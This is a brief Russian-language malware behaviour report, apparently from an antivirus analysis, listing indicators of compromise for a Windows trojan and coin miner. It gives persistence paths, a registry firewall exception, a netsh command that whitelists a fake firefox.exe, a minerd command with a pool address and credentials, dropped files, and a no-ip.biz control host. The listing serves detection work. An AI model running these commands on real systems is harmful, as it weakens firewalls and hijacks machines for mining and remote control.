Техническая информация
- %HOMEPATH%\Start Menu\Programs\Startup\7d8ebea71b3de6e50aaec50cfc56a655.exe
- [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List] '%APPDATA%\firefox.exe' = '%APPDATA%\firefox.exe:*:Enabled:firefox.exe'
- '%TEMP%\Doge\minerd.exe' -o stratum+tcp://66.55.92.73:8000 -u 9ccdc8a6bc578bb4 -p 123
- '%APPDATA%\firefox.exe'
- '<SYSTEM32>\Notbad.exe'
- '%PROGRAM_FILES%\WindowsApplication1.exe'
- '<SYSTEM32>\wbem\wmiadap.exe' /R /T
- '<SYSTEM32>\netsh.exe' firewall add allowedprogram "%APPDATA%\firefox.exe" "firefox.exe" ENABLE
- %TEMP%\Doge\libwinpthread-1.dll
- %TEMP%\Doge\libcurl-4.dll
- %TEMP%\Doge\minerd.exe
- %APPDATA%\firefox.exe
- %TEMP%\Doge\zlib1.dll
- %PROGRAM_FILES%\Sonera Corporative OU\Coin Miner\Uninstall.ini
- %TEMP%\$inst\temp_0.tmp
- %TEMP%\$inst\2.tmp
- <SYSTEM32>\Notbad.exe
- %PROGRAM_FILES%\Sonera Corporative OU\Coin Miner\Uninstall.exe
- %PROGRAM_FILES%\WindowsApplication1.exe
- <SYSTEM32>\wbem\Performance\WmiApRpl.ini
- <SYSTEM32>\PerfStringBackup.TMP
- %TEMP%\$inst\temp_0.tmp
- %TEMP%\$inst\2.tmp
- 'al####2.no-ip.biz':5552
- '66.#5.92.73':8000
- DNS ASK al####2.no-ip.biz
- ClassName: 'Shell_TrayWnd' WindowName: ''